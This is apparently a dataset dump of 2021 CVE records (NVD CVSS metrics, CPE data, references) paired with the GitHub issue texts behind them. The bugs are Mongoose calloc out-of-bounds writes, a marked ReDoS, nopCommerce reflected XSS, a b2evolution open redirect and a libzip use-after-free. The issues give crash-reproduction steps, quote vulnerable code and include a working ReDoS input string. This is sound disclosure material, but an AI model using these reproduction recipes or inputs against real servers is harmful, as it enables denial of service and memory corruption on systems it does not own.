(Because memory operations can occur in a different sequence, actions 9. and 10. sometimes need to be executed multiple times.)
You should receive similar output:
process 21111 is executing new program: mongoose/examples/complete/example
2021-01-21 00:00:00 I mongoose.c:2899:mg_listen 1 accepting on http://localhost:8000
Program received signal SIGSEGV, Segmentation fault.
0x0000555555558ef1 in mg_http_serve_file (c=0x55555576a8c0, hm=0x7fffffffdb90, path=0x5555555667d4 "log.txt", mime=0x5555555667c9 "text/plain", hdrs=0x5555555667c8 "") at ../../mongoose.c:800
800 d->fp = fp;
#0 0x0000555555558ef1 in mg_http_serve_file (c=0x55555576a8c0, hm=0x7fffffffdb90, path=0x5555555667d4 "log.txt", mime=0x5555555667c9 "text/plain", hdrs=0x5555555667c8 "") at ../../mongoose.c:800
#1 0x000055555556269e in cb (c=0x55555576a8c0, ev=8, ev_data=0x7fffffffdb90, fn_data=0x7fffffffe250) at main.c:122
#2 0x0000555555557581 in mg_call (c=0x55555576a8c0, ev=8, ev_data=0x7fffffffdb90) at ../../mongoose.c:397
#3 0x00005555555598f5 in http_cb (c=0x55555576a8c0, ev=5, ev_data=0x7fffffffe170, fn_data=0x7fffffffe250) at ../../mongoose.c:1146
#4 0x0000555555557557 in mg_call (c=0x55555576a8c0, ev=5, ev_data=0x7fffffffe170) at ../../mongoose.c:396
#5 0x000055555555e30e in read_conn (c=0x55555576a8c0, fn=0x55555555dc3a <ll_read>) at ../../mongoose.c:2689
#6 0x000055555555f71a in mg_mgr_poll (mgr=0x7fffffffe250, ms=100) at ../../mongoose.c:2995
#7 0x0000555555562af3 in main () at main.c:203 | Out-of-bounds write caused by incorrect error handling of calloc in mg_http_serve_file (mongoose.c:800) | https://api.github.com/repos/cesanta/mongoose/issues/1201/comments | 1 | 2021-01-23T13:57:54Z | 2021-01-26T12:17:56Z | https://github.com/cesanta/mongoose/issues/1201 | 792,565,056 | 1,201 | 1,693 |
CVE-2021-26529 | 2021-02-08T21:15:13.740 | The mg_tls_init function in Cesanta Mongoose HTTPS server 7.0 and 6.7-6.18 (compiled with mbedTLS support) is vulnerable to remote OOB write attack via connection request after exhausting memory pool. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.4,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 4.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.2,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/cesanta/mongoose/issues/1203"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/cesanta/mongoose/issues/1203"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cesanta:mongoose:*:*:*:*:*:*:*:*",
"matchCriteriaId": "7B840E82-6F04-41CB-AF1C-50643326A123",
"versionEndExcluding": null,
"versionEndIncluding": "6.18",
"versionStartExcluding": null,
"versionStartIncluding": "6.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:cesanta:mongoose:7.0:*:*:*:*:*:*:*",
"matchCriteriaId": "60B6E6E9-893D-4993-B8E4-906343FF7837",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/cesanta/mongoose/issues/1203 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"cesanta",
"mongoose"
] | Mongoose HTTPS server (compiled with mbedTLS support) is vulnerable to remote OOB write attack via connection request after exhausting memory pool.
Incorrect handling of the value returned by calloc in mg_tls_init may lead to:
- out-of-bound write attempt and segmentation fault error in case of restrictive memory protection,
- near NULL pointer (at 0x458) overwrite in case of limited memory restrictions (e.g. in embedded environments).
Memory allocations are triggered during handling of each HTTPS requests, so the allocation error can be caused remotely by flooding with requests until exhausting the memory.
In some embedded environments near zero memory areas are used to store device configuration, so in this case such configuration can be overwritten remotely.
Vulnerable code (mongoose.c):
3255: struct mg_tls {
3256: char *cafile; // CA certificate path
3257: mbedtls_x509_crt ca; // Parsed CA certificate
3258: mbedtls_x509_crt cert; // Parsed certificate
3259: mbedtls_ssl_context ssl; // SSL/TLS context
3260: mbedtls_ssl_config conf; // SSL-TLS config
3261: mbedtls_pk_context pk; // Private key context
3262: };
3296: int mg_tls_init(struct mg_connection *c, struct mg_tls_opts *opts) {
3297: struct mg_tls *tls = (struct mg_tls *) calloc(1, sizeof(*tls)); printf("mg_tls_init tls = %p %ld\n", tls, &(tls->ssl));
3298: int rc = 0;
3299: LOG(LL_DEBUG, ("%lu Setting TLS, CA: %s, cert: %s, key: %s", c->id,
3300: opts->ca == NULL ? "null" : opts->ca,
3301: opts->cert == NULL ? "null" : opts->cert,
3302: opts->certkey == NULL ? "null" : opts->certkey));
3303: mbedtls_ssl_init(&tls->ssl);
3304: mbedtls_ssl_config_init(&tls->conf);
3305: mbedtls_ssl_conf_dbg(&tls->conf, debug_cb, c);
See following recommendations for details (especially the calloc example):
https://wiki.sei.cmu.edu/confluence/display/c/ERR33-C.+Detect+and+handle+standard+library+errors
The issue can be reproduced and tested using ErrorSanitizer (https://gitlab.com/ErrorSanitizer/ErrorSanitizer).
Reproduction steps:
0. Install gdb
1. Download and unpack code of ErrorSanitizer (https://gitlab.com/ErrorSanitizer/ErrorSanitizer)
2. Perform compilation of ErrorSanitizer according to the manual (https://gitlab.com/ErrorSanitizer/ErrorSanitizer#compilation)
cd ErrorSanitizer; make
3. Set ESAN to the path of ErrorSanitizer directory
export ESAN=/opt/...
4. Download and unzip attached map temp_2.cur_input
[temp_2.cur_input.zip](https://github.com/cesanta/mongoose/files/5860691/temp_2.cur_input.zip)
5. Install mbedTLS library
6. Download, unzip and compile mongoose example "http-restful-server" with define MBEDTLS_DIR set for mbedTLS directory and debug symbols (-g)
7. Run Mongoose "http-restful-server" example with ErrorSanitizer in gdb using:
gdb -batch -ex='run' -ex='backtrace' --args env LD_PRELOAD="$ESAN/error_sanitizer_preload.so" ./example temp_2.cur_input
8. Open in the browser following URL (where <MONGOOSE_ADDR> is address of tested Mongoose instance):
https://<MONGOOSE_ADDR>:8000
You should receive similar output:
process 30197 is executing new program: mongoose/examples/http-restful-server/example
2021-01-21 00:00:00 I log.c:18:mg_log_set Setting log level to 2
2021-01-21 00:00:00 I sock.c:453:mg_listen 1 accepting on https://localhost:8000
Program received signal SIGSEGV, Segmentation fault.
0x00007ffff79970d0 in mbedtls_ssl_init () from /usr/lib/x86_64-linux-gnu/libmbedtls.so.10
#0 0x00007ffff79970d0 in mbedtls_ssl_init () from /usr/lib/x86_64-linux-gnu/libmbedtls.so.10
#1 0x0000555555560fa9 in mg_tls_init (c=0x5555557688c0, opts=0x7fffffffdbf0) at src/tls.c:70
#2 0x000055555556377a in fn (c=0x5555557688c0, ev=4, ev_data=0x0, fn_data=0x0) at main.c:28
#3 0x0000555555557df1 in mg_call (c=0x5555557688c0, ev=4, ev_data=0x0) at src/event.c:9
#4 0x000055555555fae4 in accept_conn (mgr=0x7fffffffdd20, lsn=0x5555557686c0) at src/sock.c:393
#5 0x0000555555560484 in mg_mgr_poll (mgr=0x7fffffffdd20, ms=1000) at src/sock.c:543
#6 0x00005555555638de in main () at main.c:51 | Out-of-bounds write caused by incorrect error handling of calloc in mg_tls_init (mongoose.c:3297) | https://api.github.com/repos/cesanta/mongoose/issues/1203/comments | 1 | 2021-01-23T17:58:50Z | 2021-01-26T12:17:48Z | https://github.com/cesanta/mongoose/issues/1203 | 792,617,302 | 1,203 | 1,694 |
CVE-2021-26530 | 2021-02-08T21:15:13.803 | The mg_tls_init function in Cesanta Mongoose HTTPS server 7.0 (compiled with OpenSSL support) is vulnerable to remote OOB write attack via connection request after exhausting memory pool. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.4,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 4.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.2,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/cesanta/mongoose/issues/1204"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/cesanta/mongoose/issues/1204"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cesanta:mongoose:7.0:*:*:*:*:*:*:*",
"matchCriteriaId": "60B6E6E9-893D-4993-B8E4-906343FF7837",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/cesanta/mongoose/issues/1204 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"cesanta",
"mongoose"
] | Mongoose HTTPS server (compiled with OpenSSL support) is vulnerable to remote OOB write attack via connection request after exhausting memory pool.
Incorrect handling of the value returned by calloc in mg_tls_init may lead to:
- out-of-bound write attempt and segmentation fault error in case of restrictive memory protection,
- near NULL pointer overwrite in case of limited memory restrictions (e.g. in embedded environments).
Memory allocations are triggered during handling of each HTTPS requests, so the allocation error can be caused remotely by flooding with requests until exhausting the memory.
In some embedded environments near zero memory areas are used to store device configuration, so in this case such configuration can be overwritten remotely.
Vulnerable code (mongoose.c):
3421: struct mg_tls {
3422: SSL_CTX *ctx;
3423: SSL *ssl;
3424: };
3442: int mg_tls_init(struct mg_connection *c, struct mg_tls_opts *opts) {
3443: struct mg_tls *tls = (struct mg_tls *) calloc(1, sizeof(*tls)); printf("tls = %p %ld\n", tls, (long)(&tls->ctx));
3444: const char *id = "mongoose";
3445: static unsigned char s_initialised = 0;
3446: int rc;
3447: if (!s_initialised) {
3448: SSL_library_init();
3449: s_initialised++;
3450: }
3455: tls->ctx = c->is_client ? SSL_CTX_new(SSLv23_client_method())
3456: : SSL_CTX_new(SSLv23_server_method());
3457: if ((tls->ssl = SSL_new(tls->ctx)) == NULL) {
3458: mg_error(c, "SSL_new");
3459: goto fail;
3460: }
See following recommendations for details (especially the calloc example):
https://wiki.sei.cmu.edu/confluence/display/c/ERR33-C.+Detect+and+handle+standard+library+errors
The issue can be reproduced and tested using ErrorSanitizer (https://gitlab.com/ErrorSanitizer/ErrorSanitizer).
Reproduction steps:
0. Install gdb
1. Download and unpack code of ErrorSanitizer (https://gitlab.com/ErrorSanitizer/ErrorSanitizer)
2. Perform compilation of ErrorSanitizer according to the manual (https://gitlab.com/ErrorSanitizer/ErrorSanitizer#compilation)
cd ErrorSanitizer; make
3. Set ESAN to the path of ErrorSanitizer directory
export ESAN=/opt/...
4. Download and unzip attached map temp_2.cur_input
[temp_2.cur_input.zip](https://github.com/cesanta/mongoose/files/5860691/temp_2.cur_input.zip)
5. Install OpenSSL library
6. Download, unzip and compile mongoose example "http-restful-server" with define OPENSSL_DIR set for OpenSSL directory and debug symbols (-g)
7. Run Mongoose "http-restful-server" example with ErrorSanitizer in gdb using:
gdb -batch -ex='run' -ex='backtrace' --args env LD_PRELOAD="$ESAN/error_sanitizer_preload.so" ./example temp_2.cur_input
8. Open in the browser following URL (where <MONGOOSE_ADDR> is address of tested Mongoose instance):
https://<MONGOOSE_ADDR>:8000
You should receive similar output:
process 10544 is executing new program: mongoose/examples/http-restful-server-openssl/example
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
2021-01-21 00:00:00 I sock.c:461:mg_listen 1 accepting on https://localhost:8000
Program received signal SIGSEGV, Segmentation fault.
0x0000555555560d6a in mg_tls_init (c=0x555555768780, opts=0x7fffffffdbf0) at src/tls.c:209
209 src/tls.c: No such file or directory.
#0 0x0000555555560d6a in mg_tls_init (c=0x555555768780, opts=0x7fffffffdbf0) at src/tls.c:209
#1 0x0000555555563860 in fn (c=0x555555768780, ev=4, ev_data=0x0, fn_data=0x0) at main.c:28
#2 0x0000555555557d11 in mg_call (c=0x555555768780, ev=4, ev_data=0x0) at src/event.c:9
#3 0x000055555555fa1d in accept_conn (mgr=0x7fffffffdd10, lsn=0x555555769500) at src/sock.c:398
#4 0x00005555555603bd in mg_mgr_poll (mgr=0x7fffffffdd10, ms=1000) at src/sock.c:551
#5 0x00005555555639bb in main () at main.c:49 | Out-of-bounds write caused by incorrect error handling of calloc in mg_tls_init (mongoose.c:3443) | https://api.github.com/repos/cesanta/mongoose/issues/1204/comments | 1 | 2021-01-23T18:20:54Z | 2021-01-26T12:17:41Z | https://github.com/cesanta/mongoose/issues/1204 | 792,621,378 | 1,204 | 1,695 |
CVE-2021-21306 | 2021-02-08T22:15:12.450 | Marked is an open-source markdown parser and compiler (npm package "marked"). In marked from version 1.1.1 and before version 2.0.0, there is a Regular expression Denial of Service vulnerability. This vulnerability can affect anyone who runs user generated code through marked. This vulnerability is fixed in version 2.0.0. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 1.4,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/markedjs/marked/commit/7293251c438e3ee968970f7609f1a27f9007bccd"
},
{
"source": "security-advisories@github.com",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/markedjs/marked/issues/1927"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/markedjs/marked/pull/1864"
},
{
"source": "security-advisories@github.com",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/markedjs/marked/security/advisories/GHSA-4r62-v4vq-hr96"
},
{
"source": "security-advisories@github.com",
"tags": [
"Product",
"Third Party Advisory"
],
"url": "https://www.npmjs.com/package/marked"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/markedjs/marked/commit/7293251c438e3ee968970f7609f1a27f9007bccd"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/markedjs/marked/issues/1927"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/markedjs/marked/pull/1864"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/markedjs/marked/security/advisories/GHSA-4r62-v4vq-hr96"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Product",
"Third Party Advisory"
],
"url": "https://www.npmjs.com/package/marked"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:marked_project:marked:*:*:*:*:*:node.js:*:*",
"matchCriteriaId": "A9E51743-C978-477B-8B63-EEFC0C7EA788",
"versionEndExcluding": "2.0.0",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "1.1.1",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"400"
] | 400 | https://github.com/markedjs/marked/issues/1927 | [
"Third Party Advisory"
] | github.com | [
"markedjs",
"marked"
] | **Marked version:** 1.2.9
**Describe the bug**
3 or more groups of odd and even-numbered consecutive underscores followed by a character takes a very long time to convert.
Example input: `_______________________________ ____________________ __________________________ a`
If you click on the Marked Demo link below, you will see that this takes a long time to convert (approximately 2 minutes).
The input above is:
31 underscores, 20 underscores, 26 underscores, and an `a`.
Modifying the input in a number of ways changes the conversion time to < 10ms:
- modifying the above input so that the 1st group of underscores is an even number
- modifying the 2nd or 3rd group of underscores to be an odd number
- removing the trailing `a` character.
It seems that the longer the consecutive underscores are in length, the time increasingly gets longer.
**To Reproduce**
Steps to reproduce the behavior:
<!-- If possible, use the Marked Demo permalink and compare to the CommonMark Dingus permalink to demonstrate the bug -->
1. [Marked Demo](https://marked.js.org/demo/?text=_______________________________%20____________________%20__________________________%20a&options=%7B%0A%20%22baseUrl%22%3A%20null%2C%0A%20%22breaks%22%3A%20false%2C%0A%20%22gfm%22%3A%20true%2C%0A%20%22headerIds%22%3A%20true%2C%0A%20%22headerPrefix%22%3A%20%22%22%2C%0A%20%22highlight%22%3A%20null%2C%0A%20%22langPrefix%22%3A%20%22language-%22%2C%0A%20%22mangle%22%3A%20true%2C%0A%20%22pedantic%22%3A%20false%2C%0A%20%22sanitize%22%3A%20false%2C%0A%20%22sanitizer%22%3A%20null%2C%0A%20%22silent%22%3A%20false%2C%0A%20%22smartLists%22%3A%20false%2C%0A%20%22smartypants%22%3A%20false%2C%0A%20%22tokenizer%22%3A%20null%2C%0A%20%22walkTokens%22%3A%20null%2C%0A%20%22xhtml%22%3A%20false%0A%7D&version=1.2.9)
2. [CommonMark Demo](https://spec.commonmark.org/dingus/?text=_______________________________%20____________________%20__________________________%20a)
**Expected behavior**
The markdown to html conversion should take roughly the same amount of time as it does as when the above example input is modified such in one of the ways describe above (i.e. < 10ms). | Groups of consecutive underscores in a specific pattern hang/take a long time to convert | https://api.github.com/repos/markedjs/marked/issues/1927/comments | 12 | 2021-02-05T01:36:23Z | 2021-05-11T18:39:42Z | https://github.com/markedjs/marked/issues/1927 | 801,767,434 | 1,927 | 1,696 |
CVE-2021-26916 | 2021-02-08T22:15:12.873 | In nopCommerce 4.30, a Reflected XSS issue in the Discount Coupon component allows remote attackers to inject arbitrary web script or HTML through the Filters/CheckDiscountCouponAttribute.cs discountcode parameter. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/nopSolutions/nopCommerce/issues/5322"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/nopSolutions/nopCommerce/issues/5322"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:nopcommerce:nopcommerce:4.30:-:*:*:*:*:*:*",
"matchCriteriaId": "36397DE8-5530-44AD-94C0-926A81A5933E",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/nopSolutions/nopCommerce/issues/5322 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"nopSolutions",
"nopCommerce"
] | The vulnerability is a reflected XSS in the discountcode URL parameter. If an invalid discount code is entered, the value is reflected directly in the response without HTML encoding. This was tested on Google Chrome, Firefox and Edge with a fresh install of nopCommerce. I have attached a screenshot of the PoC.
The cause of the issue is the following line: https://github.com/nopSolutions/nopCommerce/blob/879275b29724da0b407212e1b51fcad4836322ab/src/Presentation/Nop.Web.Framework/Mvc/Filters/CheckDiscountCouponAttribute.cs#L134 which uses the String.format() function without sanitising the user input.
The same code exists in the 4.3.0 release tag as well: https://github.com/nopSolutions/nopCommerce/blob/9f6002d71f088fd27f247ce0741d05039883b12d/src/Presentation/Nop.Web.Framework/Mvc/Filters/CheckDiscountCouponAttribute.cs#L132
Let me know if you require additional information.

| XSS issue in the "discountcode" parameter | https://api.github.com/repos/nopSolutions/nopCommerce/issues/5322/comments | 1 | 2021-02-08T06:57:44Z | 2021-02-15T11:36:05Z | https://github.com/nopSolutions/nopCommerce/issues/5322 | 803,259,316 | 5,322 | 1,697 |
CVE-2020-22840 | 2021-02-09T14:15:14.903 | Open redirect vulnerability in b2evolution CMS version prior to 6.11.6 allows an attacker to perform malicious open redirects to an attacker controlled resource via redirect_to parameter in email_passthrough.php. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 4.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/161362/b2evolution-CMS-6.11.6-Open-Redirection.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/b2evolution/b2evolution/issues/102"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "https://www.exploit-db.com/exploits/49554"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/161362/b2evolution-CMS-6.11.6-Open-Redirection.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/b2evolution/b2evolution/issues/102"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "https://www.exploit-db.com/exploits/49554"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:b2evolution:b2evolution:*:*:*:*:*:*:*:*",
"matchCriteriaId": "165A561F-3E58-44E9-9362-EB9F4DCD7C40",
"versionEndExcluding": "6.11.6",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"601"
] | 601 | https://github.com/b2evolution/b2evolution/issues/102 | [
"Third Party Advisory"
] | github.com | [
"b2evolution",
"b2evolution"
] | Hi @fplanque,
We have identified the following vulnerabilities in version 6.11.6-stable:
- Open redirect
- Multiple XSS
Please check your mail for more information.
| Multiple vulnerabilies in b2evolution version: 6.11.6-stable | https://api.github.com/repos/b2evolution/b2evolution/issues/102/comments | 5 | 2020-04-27T13:48:14Z | 2020-07-09T21:42:45Z | https://github.com/b2evolution/b2evolution/issues/102 | 607,565,832 | 102 | 1,698 |
CVE-2019-17582 | 2021-02-09T19:15:12.553 | A use-after-free in the _zip_dirent_read function of zip_dirent.c in libzip 1.2.0 allows attackers to have an unspecified impact by attempting to unzip a malformed ZIP archive. NOTE: the discoverer states "This use-after-free is triggered prior to the double free reported in CVE-2017-12858." | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/nih-at/libzip/commit/2217022b7d1142738656d891e00b3d2d9179b796"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/nih-at/libzip/issues/5"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes",
